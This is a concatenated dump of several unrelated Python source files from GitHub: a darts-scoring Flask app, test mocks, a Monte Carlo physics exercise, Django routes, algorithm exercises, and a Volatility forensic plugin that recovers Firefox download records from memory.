padx=(5, 10))\r\n\r\nroot.mainloop()\r\nis_on = False\r\n","repo_name":"jereifej/PM-212_Connection","sub_path":"Connection_GUI.py","file_name":"Connection_GUI.py","file_ext":"py","file_size_in_byte":7149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37039223718","text":"import unittest\nfrom unittest.mock import patch\nfrom code_generator import get_code\nfrom code_generator import get_code_with_day\n\n\nclass TestGetCode(unittest.TestCase):\n\n @patch('random.randint')\n def test_get_code_mock_should_return_3(self, mocked_random):\n mocked_random.return_value = 3\n actual = get_code()\n expected = 'CX-3'\n self.assertEqual(actual, expected)\n\n\nclass TestGetCodeWithDay(unittest.TestCase):\n\n @patch('random.randint')\n def test_get_code_with_day_with_today_date(self, mock_int):\n mock_int.return_value = 5\n actual = get_code_with_day()\n expected = 'CX-5-TUE'\n self.assertEqual(actual, expected)\n\n @patch('code_generator.get_today_name')\n @patch('random.randint')\n def test_get_code_with_day_with_mocked_friday(self, mock_int, mock_day):\n mock_int.return_value = 5\n mock_day.return_value = 'FRI'\n actual = get_code_with_day()\n expected = 'CX-5-FRI'\n self.assertEqual(actual, expected)\n\n @patch('code_generator.get_today_name')\n @patch('random.randint')\n def test_get_code_with_day_with_mocked_sunday(self, mock_int, mock_day):\n mock_int.return_value = 5\n mock_day.return_value = 'SUN'\n actual = get_code_with_day()\n expected = 'CX-5-SUN'\n self.assertEqual(actual, expected)\n\n","repo_name":"adrian88szymanski/Python_project","sub_path":"Python_Unittest/12_mocking/04_project/test_code.py","file_name":"test_code.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"40791684859","text":"from functools import wraps\nfrom hashlib import sha256\nimport os\nimport uuid\nfrom flask import Flask, session, jsonify, request, render_template, redirect, url_for, make_response, flash\nfrom flask_cors import CORS, cross_origin\nfrom flask_login import LoginManager\nfrom flask_socketio import SocketIO, emit, join_room\nfrom flask_uuid import FlaskUUID\nfrom werkzeug.exceptions import abort\n\n\nfrom src.models.database import Database\nfrom src.models.user import User\nfrom src.models.aroundtheboard import AroundTheWorld\nfrom src.models.dartsat import DartsAt\nfrom src.models.bobs27 import Bobs27\n\napp = Flask(__name__)\nFlaskUUID(app)\n__author__ = 'jamie'\n\nMONGODB_URI = os.environ.get('MONGO_URL')\n\n\napp.secret_key = os.urandom(24)\n\nsocketio = SocketIO(app)\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\n\ncors = CORS(app)\napp.config['CORS_HEADERS'] = 'Content-Type'\n\n\nmatch = None\n\nconnected_users = list()\nopponent = None\n\n\ndef ssl_required(fn):\n @wraps(fn)\n def decorated_view(*args, **kwargs):\n return redirect(request.url.replace(\"http://\", \"https://\"))\n\n return decorated_view\n\n\ndef loggedin(function):\n @wraps(function)\n def wrapper():\n if 'name' in session:\n return make_response(function())\n else:\n abort(401)\n return wrapper\n\n\ndef setup_database():\n Database.initialize(MONGODB_URI)\n\n\n@app.route('/')\ndef home_page():\n\n if 'email' in session:\n return render_template(\"index.html\", message=\"You are logged in as \" + session['name'])\n return render_template(\"index.html\")\n\n\n@app.route('/register')\ndef register_page():\n return render_template(\"register.html\")\n\n\n@app.route('/login')\ndef login_page():\n return render_template(\"login.html\")\n\n\n@app.route('/player-lobby')\n@loggedin\ndef player_lobby():\n return render_template(\"player-lobby.html\")\n\n\n@app.route('/games')\n@loggedin\ndef games_list():\n return render_template(\"games.html\")\n\n\n@app.route('/around-the-board', methods=['GET'])\n@loggedin\ndef around_the_board_page():\n mode = request.args.get('mode')\n\n if mode in (\"Any\", \"Single\", \"Double\", \"Treble\"):\n return render_template(\"around-the-board.html\", mode=mode)\n else:\n abort(403)\n\n\n@app.route('/100-darts-at', methods=['GET'])\n@loggedin\ndef darts_at_page():\n mode = request.args.get('mode')\n if mode in (\"20\", \"19\", \"18\", \"17\", \"16\", \"15\", \"Bull\"):\n return render_template(\"100-darts-at.html\", mode=mode)\n else:\n abort(403)\n\n\n@app.route('/bobs-27')\n@loggedin\ndef bobs_27_page():\n return render_template(\"bobs-27.html\")\n\n\n@app.route('/profile')\n@loggedin\ndef profile_page():\n return render_template(\"profile.html\")\n\n\n@app.route('/stats/100-darts-at')\n@loggedin\ndef darts_at_stats():\n player = session['name']\n games = DartsAt.get_games(player)\n return render_template(\"darts-at-overall.html\", dartsAt=games)\n\n\n@app.route('/stats/around-the-board')\n@loggedin\ndef around_the_board_stats():\n player = session['name']\n games = AroundTheWorld.get_games(player)\n return render_template(\"around-the-board-overall.html\", aroundTheBoard=games)\n\n\n@app.route('/stats/bobs-27')\n@loggedin\ndef bobs_27_stats():\n player = session['name']\n games = Bobs27.get_games(player)\n return render_template(\"bobs-27-overall.html\", bobs27=games)\n\n\n@app.route('/bobs-27-summary', methods=['GET'])\n@loggedin\ndef bobs_27_summary():\n game_id = request.args.get('game_id')\n game = Bobs27.get_by_id(uuid.UUID(game_id))\n hitsOnEachNumberDict = game['hitsOnEachNumber']\n hitsOnNumber = []\n hitsOnNumber.append(hitsOnEachNumberDict['1'])\n hitsOnNumber.append(hitsOnEachNumberDict['2'])\n hitsOnNumber.append(hitsOnEachNumberDict['3'])\n hitsOnNumber.append(hitsOnEachNumberDict['4'])\n hitsOnNumber.append(hitsOnEachNumberDict['5'])\n hitsOnNumber.append(hitsOnEachNumberDict['6'])\n hitsOnNumber.append(hitsOnEachNumberDict['7'])\n hitsOnNumber.append(hitsOnEachNumberDict['8'])\n hitsOnNumber.append(hitsOnEachNumberDict['9'])\n hitsOnNumber.append(hitsOnEachNumberDict['10'])\n hitsOnNumber.append(hitsOnEachNumberDict['11'])\n hitsOnNumber.append(hitsOnEachNumberDict['12'])\n hitsOnNumber.append(hitsOnEachNumberDict['13'])\n hitsOnNumber.append(hitsOnEachNumberDict['14'])\n hitsOnNumber.append(hitsOnEachNumberDict['15'])\n hitsOnNumber.append(hitsOnEachNumberDict['16'])\n hitsOnNumber.append(hitsOnEachNumberDict['17'])\n hitsOnNumber.append(hitsOnEachNumberDict['18'])\n hitsOnNumber.append(hitsOnEachNumberDict['19'])\n hitsOnNumber.append(hitsOnEachNumberDict['20'])\n hitsOnNumber.append(hitsOnEachNumberDict['Bull'])\n return render_template('bobs-27-summary.html', game=game, hits=hitsOnNumber)\n\n\n@app.route('/darts-at-summary', methods=['GET'])\n@loggedin\ndef darts_at_summary():\n game_id = request.args.get('game_id')\n game = DartsAt.get_by_id(uuid.UUID(game_id))\n\n return render_template('darts-at-summary.html', game=game)\n\n\n@app.route('/around-the-board-summary', methods=['GET'])\n@loggedin\ndef around_the_board_summary():\n game_id = request.args.get('game_id')\n game = AroundTheWorld.get_by_id(uuid.UUID(game_id))\n dartsThrownAtDict = game['numberOfDartsAtEachNumber']\n dartsThrownAt = []\n dartsThrownAtLabels = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11','12', '13', '14', '15', '16',\n '17', '18', '19', '20', 'Bull']\n\n # can't loop through because keys are unordered strings. Auto ordering does not work.\n dartsThrownAt.append(dartsThrownAtDict['1'])\n dartsThrownAt.append(dartsThrownAtDict['2'])\n dartsThrownAt.append(dartsThrownAtDict['3'])\n dartsThrownAt.append(dartsThrownAtDict['4'])\n dartsThrownAt.append(dartsThrownAtDict['5'])\n dartsThrownAt.append(dartsThrownAtDict['6'])\n dartsThrownAt.append(dartsThrownAtDict['7'])\n dartsThrownAt.append(dartsThrownAtDict['8'])\n dartsThrownAt.append(dartsThrownAtDict['9'])\n dartsThrownAt.append(dartsThrownAtDict['10'])\n dartsThrownAt.append(dartsThrownAtDict['11'])\n dartsThrownAt.append(dartsThrownAtDict['12'])\n dartsThrownAt.append(dartsThrownAtDict['13'])\n dartsThrownAt.append(dartsThrownAtDict['14'])\n dartsThrownAt.append(dartsThrownAtDict['15'])\n dartsThrownAt.append(dartsThrownAtDict['16'])\n dartsThrownAt.append(dartsThrownAtDict['17'])\n dartsThrownAt.append(dartsThrownAtDict['18'])\n dartsThrownAt.append(dartsThrownAtDict['19'])\n dartsThrownAt.append(dartsThrownAtDict['20'])\n dartsThrownAt.append(dartsThrownAtDict['Bull'])\n\n return render_template(\"around-the-board-summary.html\", game=game, dartsThrownAt=dartsThrownAt, dartsThrownAtLabels\n =dartsThrownAtLabels)\n\n\n@app.route(\"/update/100-darts-at\", methods=[\"POST\"])\n@cross_origin()\ndef update_darts_at():\n _id = uuid.uuid4()\n data = request.get_json()\n player = session['name']\n dartsThrown = data['dartsThrown']\n score = data['score']\n points = data['points']\n number = data['number']\n miss = data['miss']\n single = data['single']\n double = data['double']\n treble = data['treble']\n if DartsAt.add_game(_id, player, dartsThrown, score, points, number, miss, single, double, treble):\n return jsonify({\"message\": \"Done\", \"id\": _id}), 200\n else:\n return jsonify({\"error\": \"The data could not be saved\"}), 201\n\n\n@app.route(\"/update/bobs-27\", methods=[\"POST\"])\n@cross_origin()\ndef update_bobs_27():\n _id = uuid.uuid4()\n data = request.get_json()\n player = session['name']\n score = data['score']\n hitsOnEachNumber = data['hitsOnEachNumber']\n if Bobs27.add_game(_id, player, score, hitsOnEachNumber):\n return jsonify({\"message\": \"Done\", \"id\": _id}), 200\n else:\n return jsonify({\"error\": \"The data could not be saved\"}), 201\n\n\n@app.route(\"/update/around-the-board\", methods=[\"POST\"])\n@cross_origin()\ndef update_around_the_board():\n _id = uuid.uuid4()\n data = request.get_json()\n player = session['name']\n mode = data['mode']\n numberOfDarts = data['numberOfDarts']\n dartsAtEachNumber = data['dartsAtEachNumber']\n\n if AroundTheWorld.add_game(_id, player, numberOfDarts, dartsAtEachNumber, mode):\n return jsonify({\"message\": \"Game Saved!\", \"id\": _id}), 200\n else:\n return jsonify({\"error\": \"The data could not be saved\"}), 201\n\n\n@app.route('/auth/register', methods=[\"POST\"])\n@cross_origin()\ndef register_user():\n name = request.form['username']\n password = sha256(request.form['password'].encode('utf-8')).hexdigest()\n email = request.form['email']\n if User.register_user(name, password, email):\n session['name'] = name\n return redirect(url_for('home_page'))\n else:\n flash(\"This user already exists\")\n return redirect(url_for('register_page'))\n\n\n@app.route('/auth/login', methods=[\"POST\"])\n@cross_origin()\ndef login_user():\n user_name = request.form['username']\n user_password = request.form['password']\n\n if User.check_login(user_name, user_password):\n session['name'] = user_name\n return jsonify({\"message\": \"Logged In!\", \"username\": session['name']}), 200\n else:\n return jsonify({\"error\": \"Invalid Username Or Password\"}), 201\n\n\n@app.route('/leaderboards')\ndef leaderboards():\n around_the_board_leader = AroundTheWorld.get_leaderboard(10)\n darts_at_leader = DartsAt.get_leaderboard(10)\n bobs_27_leader = Bobs27.get_leaderboard(10)\n return render_template('leaderboards.html', around_the_board=around_the_board_leader,\n darts_at=darts_at_leader, bobs27=bobs_27_leader)\n\n\n\n@app.route('/logout')\ndef logout():\n session.clear()\n return redirect(url_for('home_page'))\n\n\n@socketio.on('joined', namespace='/chat')\ndef joined():\n user = session['name']\n join_room(user)\n connected_users.append(user)\n emit('status', {'msg': user + ' has entered the room.', 'user': user, 'userlist': connected_users}, broadcast=True)\n\n\n@socketio.on('message', namespace='/chat')\ndef message_received(message):\n user = session['name']\n emit('message received', {'message': user + ': ' + message['msg']}, broadcast=True)\n\n\n@socketio.on('playerleft', namespace='/chat')\ndef disconnected():\n user = session['name']\n connected_users.remove(user)\n emit('status', {'msg': user + ' has left the room.', 'user': user, 'userlist': connected_users}, broadcast=True)\n\n\n@socketio.on('challenge_player', namespace='/chat')\ndef challenge_player(player):\n user = session['name']\n room = player['player']\n newroom = user + room\n join_room(newroom)\n emit('challenged', {'msg': user + ' has challenged you to 501, accept?', 'player': user, 'newroom': newroom})\n\n\n@socketio.on('matchaccepted', namespace='/chat')\ndef player_accepted(data):\n join_room(data['room'])\n matchid = str(uuid.uuid1())\n url = '/match/' + matchid\n emit('beginmatch', {'url': url})\n\n\n@socketio.on('setupmatch', namespace='/chat')\ndef setup_match(data):\n join_room(data['room'])\n matchid = str(uuid.uuid1())\n url = '/match/' + matchid\n emit('beginmatch', {'url': url})\n\n\n@app.route('/player-challenged', methods=['POST'])\ndef match_accepted():\n json = request.get_json()\n\n session['opponent'] = json['player']\n room = json['newroom']\n\n return jsonify({'room': room})\n\n\n\n\n@app.route('/match/', methods=[\"GET\", \"POST\"])\ndef start_match(match_id):\n test= 12\n myData = {'name': session['name'],\n 'score': 501,\n 'dartaverage': 0,\n 'doublepercentage': 0\n }\n\n theirData = {'name': session['opponent'],\n 'score': 501,\n 'dartaverage': 0,\n 'doublepercentage': 0\n }\n\n matchData = {'id': match_id,\n 'legs': 5,\n 'sets': 1\n }\n return render_template(\"match.html\", myData=myData, theirData=theirData, matchData=matchData)\n\n\n@app.before_first_request\ndef init_app():\n setup_database()\n\n\nif __name__ == \"__main__\":\n socketio.run(app, host='0.0.0.0', debug=True)\n","repo_name":"jkerr123/darts-scorer","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33627943343","text":"# MONTE CARLO TEST WITH HARMONIC OSCILLATOR IN 1D\n\n# The prevuìious code allowd us to test the algorithm and verify the properties\n# of the local kinetic energy with some plots. However, the variational parameter\n# in the WF had to be changed manually. Now, we actually want to automate the \n# variational procedure to find the best value of alpha via a minimisation of the energy\n\nimport time\nimport numpy as np\nfrom numba import njit\nimport math as m\nimport matplotlib.pyplot as plt\nimport random as rd\n\nN_steps = 50000 # Simulation steps\nN_eq = 5000\n\n# Function to compute the WF\n\n@njit \ndef WF(x, alpha):\n \n # We can forget about the normalisation, it comes \"for free\" in MC\n \n Psi = m.exp(- x**2 / (2*alpha**2) ) #* 1 / (2*m.pi*alpha**2)**0.5\n \n return Psi\n\n# FUNCTION FOR THE METROPOLIS ALGORITHM\n\n@njit\ndef metropolis(x, N_acc, wf2_old, Delta, alpha):\n\n # First, we need to build a new configuration\n # We start from the initial one\n\n new_x = x \n\n # Variation of position\n\n rand = rd.uniform(0,1) # Pick random number\n new_x = x - Delta * (rand - 0.5) # Set new coordinate\n\n # Now, we must evaluate the acceptance ratio using the ratio of the square moduli of the WFs\n\n wf2_new = WF(new_x, alpha)**2\n\n acc = wf2_new / wf2_old\n\n # Decide acceptance\n\n xi = rd.uniform(0,1)\n\n wf2 = wf2_old\n\n if xi < acc: # new_part becomes part, we accept the MC move\n\n x = new_x\n\n N_acc += 1 # Increase the number of accepted moves\n\n wf2 = wf2_new\n\n return x, N_acc, wf2\n\n# FUNCTION TO COMPUTE THE POTENTIAL ENERGY \n\n@njit\ndef p_energy(x):\n \n p_en = 0.5 * x**2\n \n return p_en\n\n# FUNCTION TO COMPUTE THE KINETIC ENERGY\n\n@njit\ndef k_energy(x, alpha):\n \n k_en = - 0.5 * (-1 / alpha**2 + x**2 / alpha**4) \n \n return k_en\n\n# FUNCTION FOR CALCULATION OF ALL THE ENERGIES WITH REWEIGHTING \n\n@njit\ndef reweighting(alpha, alpha_s, x):\n \n l = len(alpha)\n \n weight = np.zeros(l)\n loc_en = np.zeros(l)\n \n for i in range(0, l):\n \n # compute all the weights for all the \n \n weight[i] = m.exp( (-x**2 / 2) * ( (1.0/alpha[i]**2) - (1.0/alpha_s**2) ) )\n #weight[i] = m.exp( x**2 * (alpha[i]-alpha_s)/alpha_s**2)\n \n loc_en[i] = (p_energy(x) + k_energy(x, alpha[i])) * weight[i] # Compute energy\n \n return weight, loc_en\n\n# FUNCTION TO PERFORM THE ITERATIVE PROCEDURE\n\n#@njit\ndef montecarlo(x):\n \n alpha_s = 1.0 # Parameter for which we run the simulation\n \n dalpha = np.arange(-0.1, 0.1, 0.01) # Amounts by which we use the \n \n # Construct array of variational parameters\n \n alpha = np.zeros(len(dalpha)) \n \n for i in range(0, len(dalpha)):\n \n alpha[i] = alpha_s + dalpha[i]\n \n Delta = 4 # Value of parameter for displacement\n\n # First, the equilibration steps\n\n wf2 = WF(x,alpha_s)\n\n N_acc1 = 0\n \n # Equilibration with chosen steps \n \n for s in range(0,N_eq): # stop the equilibration when variance is smaller than 1%\n \n # An adaptive scheme for Delta would be needed\n\n x, N_acc1, wf2 = metropolis(x, N_acc1, wf2, Delta, alpha_s)\n \n # An adaptive scheme for Delta \n \n if s != 0 and s%5 == 0:\n \n if N_acc1 / s >= 0.55:\n \n Delta += 0.05 * 4\n \n elif N_acc1 / s <= 0.45:\n \n Delta -= 0.05 * 4\n \n # Simulation Steps\n\n N_acc2 = 0\n cum_en = np.zeros(len(dalpha)) # Reset cumulative variable\n cum_en2 = np.zeros(len(dalpha)) # Reset cumulative variable\n cum_w = np.zeros(len(dalpha))\n mean_en = np.zeros(len(dalpha))\n std_en = np.zeros(len(dalpha))\n\n for s in range(0, N_steps):\n\n x, N_acc2, wf2 = metropolis(x, N_acc2, wf2, Delta, alpha_s)\n \n # An adaptive scheme for Delta \n \n if s != 0 and s%5 == 0:\n \n if N_acc2 / s >= 0.55:\n \n Delta += 0.05 * 4\n \n elif N_acc2 / s <= 0.45:\n \n Delta -= 0.05 * 4\n \n # Compute local energy and weight\n \n weight, loc_en = reweighting(alpha, alpha_s, x)\n \n #print(weight)\n \n for i in range(0,len(dalpha)):\n \n cum_w[i] += weight[i]\n cum_en[i] += loc_en[i] \n cum_en2[i] += (loc_en[i])**2\n \n for i in range(0,len(dalpha)):\n \n mean_en[i] = cum_en[i] / cum_w[i] \n # Had to drop an absolute value in to make stuff work\n std_en[i] = m.sqrt( 1 / (N_steps-1) * abs( cum_en2[i] / cum_w[i] - mean_en[i]**2) )\n\n accf = N_acc2/N_steps\n \n return alpha, accf, mean_en, std_en\n\n\n# EXECUTION OF THE PROCEDURE\n\n# Start procedure timing\n\nstart = time.time()\n\n# Set initial conditions3\n\nx = 0\n\n# Run the MC simulation\n\nalpha, accept, mean, std = montecarlo(x)\n\nprint(\"\\n The energy is {} pm {}\".format(np.max(mean), std[np.argmax(mean)]))\n\n# Plot the energy as a function of the variational parameter\n\nfig, ax= plt.subplots(1, figsize=(8,5.5))\nplt.errorbar(alpha, mean, std, elinewidth=1, linewidth = 0, marker=\".\", ms = 3, mec=\"blue\", mfc=\"blue\", label=\"Simulation Result\")\nplt.grid()\nplt.axhline(0.5, linewidth = 0.8, c= \"red\", label=\"Exact Value\")\n# plt.xlim([0.9,1.1])\n# plt.ylim([0.49, 0.51]) # Uncomment to see that tiny errorbars are actually there\nplt.xlabel(r\"$\\alpha$\", fontsize=14)\nplt.ylabel(\"Energy\", fontsize=14)\nplt.title(\"Energy\", fontsize=18)\nplt.legend()\nplt.savefig(\"Energies.png\", dpi = 300)\n\n# Plot the std as a function of alpha\n\nfig, ax= plt.subplots(1, figsize=(8,5.5))\nplt.plot(alpha, std, linewidth = 0, marker=\".\", ms = 3, mec=\"blue\", mfc=\"blue\")\nplt.grid()\n# plt.xlim([0.9,1.1])\n# plt.ylim([0.49, 0.51]) # Uncomment to see that tiny errorbars are actually there\nplt.xlabel(r\"$\\alpha$\", fontsize=14)\nplt.ylabel(\"Std\", fontsize=14)\nplt.title(\"Standard Deviation\", fontsize=18)\nplt.savefig(\"Standard Deviation.png\", dpi = 300)\n\n# End procedure timing\n\nend = time.time()\n\nprint(\"\\n The simulation took me {} seconds\".format(end-start))","repo_name":"NerusSkyhigh/computationalphysics2021","sub_path":"Exercise_4/Warmup_HO/Warmup_HO_Reweight.py","file_name":"Warmup_HO_Reweight.py","file_ext":"py","file_size_in_byte":6205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74103854454","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^register/$', views.register, name='register'),\n url(r'^authenticate/$', views.authenticate, name='authenticate'),\n url(r'^update_fcm_id/$', views.update_fcm_id, name='update_fcm_id'),\n url(r'^upload_photo/$', views.upload_photo, name='upload_photo'),\n url(r'^login/$', views.login, name='login'),\n url(r'^select_likes/$', views.select_likes, name='select_likes'),\n url(r'^update_users/$', views.update_users, name='update_users'),\n url(r'^get_matches/$', views.get_matches, name='get_matches'),\n url(r'^send_message/$', views.send_message, name='send_message'),\n url(r'^get_messages/$', views.get_messages, name='get_messages'),\n url(r'^logout/$', views.logout, name='logout'),\n url(r'^get_location_info/$', views.get_location_info, name='get_location_info'),\n url(r'^get_user_counts/$', views.get_user_counts, name='get_user_counts'),\n]\n","repo_name":"fedja-tica/flirtapp-api","sub_path":"web_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28502992831","text":"# 971. Flip Binary Tree To Match Preorder Traversal\n\n# Medium\n\n# You are given the root of a binary tree with n nodes, where each node\n# is uniquely assigned a value from 1 to n. You are also given a\n# sequence of n values voyage, which is the desired pre-order traversal\n# of the binary tree.\n\n# Any node in the binary tree can be flipped by swapping its left and\n# right subtrees. For example, flipping node 1 will have the following\n# effect:\n\n\n# Flip the smallest number of nodes so that the pre-order traversal of\n# the tree matches voyage.\n\n# Return a list of the values of all flipped nodes. You may return the\n# answer in any order. If it is impossible to flip the nodes in the tree\n# to make the pre-order traversal match voyage, return the list [-1].\n\n# Example 1:\n# Input: root = [1,2], voyage = [2,1]\n# Output: [-1]\n# Explanation: It is impossible to flip the nodes such that the\n# pre-order traversal matches voyage.\n\n# Example 2:\n# Input: root = [1,2,3], voyage = [1,3,2]\n# Output: [1]\n# Explanation: Flipping node 1 swaps nodes 2 and 3, so the pre-order\n# traversal matches voyage.\n\n# Example 3:\n# Input: root = [1,2,3], voyage = [1,2,3]\n# Output: []\n# Explanation: The tree's pre-order traversal already matches voyage, so\n# no nodes need to be flipped.\n\n# Constraints:\n# The number of nodes in the tree is n.\n# n == voyage.length\n# 1 <= n <= 100\n# 1 <= Node.val, voyage[i] <= n\n# All the values in the tree are unique.\n# All the values in voyage are unique.\n\nfrom typing import List\nfrom utils import checkList, TreeNode, treeFromArray\n\n\nclass Solution:\n def flipMatchVoyage(self, root: TreeNode, voyage: List[int]) -> List[int]:\n res = []\n\n def preorder(node, i):\n if not node:\n return i - 1\n if i == -1 or node.val != voyage[i]:\n return -1\n\n t = preorder(node.left, i + 1)\n if t >= 0:\n return preorder(node.right, t + 1)\n\n res.append(node.val)\n t = preorder(node.right, i + 1)\n if t >= 0:\n return preorder(node.left, t + 1)\n return -1\n\n i = preorder(root, 0)\n return res if i > -1 else [-1]\n\n\nt = Solution()\nprint(t.flipMatchVoyage(treeFromArray([1, 2, 3], 0), [1, 3, 2]))\n","repo_name":"DmitryVlaznev/leetcode","sub_path":"971-flip-binary-tree-to-match-preorder-traversal.py","file_name":"971-flip-binary-tree-to-match-preorder-traversal.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"70093891949","text":"def Binary(arr,number):\n '''\n this is the fastest Search algorithm,but the array must completion sort.\n '''\n l = 0 #the left number index\n r = len(arr) #the right number index\n while True:\n m = int((l+r)/2) #Middle index\n n = arr[m] #Middle number.\n if number==n:\n return m\n if number > n:\n l = m\n if number < n:\n r = m\n\n\ndef Linear(arr,number):\n '''\none by one search number.\n '''\n i = -1\n for x in arr:\n i = i+1\n if x==number:\n return i\n","repo_name":"icaijy/my-main-code","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34688685994","text":"import volatility.plugins.common as common\nimport volatility.scan as scan\nimport volatility.utils as utils\nimport volatility.addrspace as addrspace\nimport volatility.debug as debug\nimport volatility.obj as obj\nimport binascii\nimport sqlite_help\nimport csv\nfrom datetime import datetime\n\nFORWARD = sqlite_help.FORWARD\nBACKWARD = sqlite_help.BACKWARD\n\nclass FirefoxScanner(scan.BaseScanner):\n checks = [ ] \n\n def __init__(self, needles = None):\n self.needles = needles\n self.checks = [ (\"MultiStringFinderCheck\", {'needles':needles})]\n scan.BaseScanner.__init__(self) \n\n def scan(self, address_space, offset = 0, maxlen = None):\n for offset in scan.BaseScanner.scan(self, address_space, offset, maxlen):\n yield offset\n\n\n\nclass FirefoxDownloads(common.AbstractWindowsCommand):\n \"\"\" Scans for and parses potential Firefox download records -- downloads.sqlite moz_downloads table pre FF26 only\"\"\"\n\n def __init__(self, config, *args, **kwargs):\n common.AbstractWindowsCommand.__init__(self, config, *args, **kwargs)\n\n def calculate(self):\n address_space = utils.load_as(self._config, astype = 'physical')\n\n # definite values in Downloads records\n scanner = FirefoxScanner(needles = ['\\x06\\x06\\x08',\n '\\x06\\x06\\x09',\n ])\n downloads = {}\n for offset in scanner.scan(address_space):\n ff_buff = address_space.read(offset-16, 3000)\n start = 16\n\n good = False\n\n start -= 1\n (tempPath_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n tempPath_length = sqlite_help.varint_to_text_length(tempPath_length)\n\n # work backward from the start of the needle to the first field payload_length\n start -= varint_len\n (target_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n target_length = sqlite_help.varint_to_text_length(target_length)\n\n start -= varint_len\n (source_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n source_length = sqlite_help.varint_to_text_length(source_length)\n\n start -= varint_len\n (name_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n name_length = sqlite_help.varint_to_text_length(name_length)\n\n start -= varint_len\n (id_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n\n start -= varint_len\n (payload_header_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n\n start -= varint_len\n (row_id, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n\n start -= varint_len\n (payload_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n\n # jump back to the needle, startTime_length\n start = 16\n\n # get all of the single byte lengths around the needle\n (startTime_length, startTime) = sqlite_help.varint_type_to_length(ord(ff_buff[start]))\n (endTime_length, endTime) = sqlite_help.varint_type_to_length(ord(ff_buff[start+1]))\n (state_length, state) = sqlite_help.varint_type_to_length(ord(ff_buff[start+2]))\n\n # get the rest of the fields in the row moving forward\n start = 19\n (referrer_length, varint_len) = sqlite_help.find_varint(ff_buff, start, FORWARD)\n referrer_length = sqlite_help.varint_to_text_length(referrer_length)\n start += varint_len\n\n (entityID_length, varint_len) = sqlite_help.find_varint(ff_buff, start, FORWARD)\n entityID_length = sqlite_help.varint_to_text_length(entityID_length)\n start += varint_len\n\n (currBytes_length, currBytes) = sqlite_help.varint_type_to_length(ord(ff_buff[start]))\n (maxBytes_length, maxBytes) = sqlite_help.varint_type_to_length(ord(ff_buff[start+1]))\n\n start += 2\n\n (mimeType_length, varint_len) = sqlite_help.find_varint(ff_buff, start, FORWARD)\n mimeType_length = sqlite_help.varint_to_text_length(mimeType_length)\n start += varint_len\n\n (preferredApplication_length, varint_len) = sqlite_help.find_varint(ff_buff, start, FORWARD)\n preferredApplication_length = sqlite_help.varint_to_text_length(preferredApplication_length)\n start += varint_len\n\n (preferredAction_length, preferredAction) = sqlite_help.varint_type_to_length(ord(ff_buff[start]))\n (autoResume_length, autoResume) = sqlite_help.varint_type_to_length(ord(ff_buff[start+1]))\n\n start += 2\n \n name = ff_buff[start:start+name_length]\n start += name_length\n\n source = ff_buff[start:start+source_length]\n start += source_length\n\n target = ff_buff[start:start+target_length]\n start += target_length\n\n tempPath = ff_buff[start:start+tempPath_length]\n start += tempPath_length\n\n # do some checks on the startTime/endTime to make sure they are valid\n startTime = ff_buff[start:start+startTime_length]\n startTime = sqlite_help.sql_unpack(startTime)\n if startTime > 0 and startTime:\n startTime = sqlite_help.get_nixtime_from_msec(startTime)\n if type(startTime) is not datetime:\n continue\n start += startTime_length\n\n endTime = ff_buff[start:start+endTime_length]\n endTime = sqlite_help.sql_unpack(endTime)\n if endTime > 0 and startTime:\n endTime = sqlite_help.get_nixtime_from_msec(endTime)\n if type(endTime) is not datetime:\n continue\n start += endTime_length\n\n # if both dates are 1970, it's probably a bad record and not very useful, so skip\n # if only 1 is 1970, print it because it may be an old record with one valid date\n if startTime.year == 1970 and endTime.year == 1970:\n continue\n\n if state_length > 0:\n state = sqlite_help.sql_unpack(ff_buff[start:start+state_length])\n start += state_length\n\n referrer = ff_buff[start:start+referrer_length]\n start += referrer_length\n\n entityID = ff_buff[start:start+entityID_length]\n start += entityID_length\n\n currBytes = ff_buff[start:start+currBytes_length]\n currBytes = sqlite_help.sql_unpack(currBytes)\n # skip if negative or greater than 1TB\n if currBytes < 0 or currBytes > 1000000000000:\n continue\n start += currBytes_length\n\n maxBytes = ff_buff[start:start+maxBytes_length]\n maxBytes = sqlite_help.sql_unpack(maxBytes)\n # skip if negative or greater than 1TB\n if maxBytes < 0 or maxBytes > 1000000000000:\n continue\n start += maxBytes_length\n\n mimeType = ff_buff[start:start+mimeType_length]\n start += mimeType_length\n\n preferredApplication = ff_buff[start:start+preferredApplication_length]\n start += preferredApplication_length\n\n # these fields can have a value 0x8 or 0x9 in the length field\n # in that case, the \"data\" portion is not there, and the value is impled \n # to be 0 or 1, respectively\n if preferredAction_length > 0:\n preferredAction = ff_buff[start:start+preferredAction_length]\n preferredAction = sqlite_help.sql_unpack(preferredAction)\n start += preferredAction_length\n \n if autoResume_length > 0:\n autoResume = ff_buff[start:start+autoResume_length]\n autoResume = sqlite_help.sql_unpack(autoResume)\n start += autoResume_length\n\n # add all the fields to a tuple so we only print a unique record once\n downloads_tuple = (row_id, name, source, target, tempPath, 